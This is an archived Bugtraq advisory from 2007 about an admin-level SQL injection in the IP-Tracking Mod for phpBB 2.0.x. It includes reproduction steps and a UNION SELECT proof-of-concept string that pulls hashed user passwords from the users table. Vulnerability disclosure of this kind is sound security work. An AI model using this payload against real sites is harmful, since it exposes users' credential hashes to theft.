Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

SQL-Injection in IP-TRACKING Mod for phpBB2.0.x
From: Cornelius Riemenschneider <c.r1 () gmx de>
Date: Sun, 20 May 2007 19:48:06 +0200
Information: The IP-Tracking Mod is a Extension for phpBB2.0.x which logs all Page hits the user of the Boards do including Referer, IP and Username. It contains a SQL-Injection on Admin-Level. You can get it from: http://www.phpbb.de/viewtopic.php?t=63690&postdays=0&postorder=asc&start=0
Steps to reproduce: Go into your ACP, select under IP-Tracking IP-Search, select "no" at use wildcards and enter in Search Query what you want. It is direct passed through the Query. As Search Type I used IP. 

PoC: enter
' UNION SELECT user_password as ip,user_id,username,user_active,user_regdate,user_level,user_posts from phpbb_users# 
as Search-Query. This will display you all the hashed Userpasswords in IP

  By Date           By Thread  

Current thread:
  • SQL-Injection in IP-TRACKING Mod for phpBB2.0.x Cornelius Riemenschneider (May 22)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]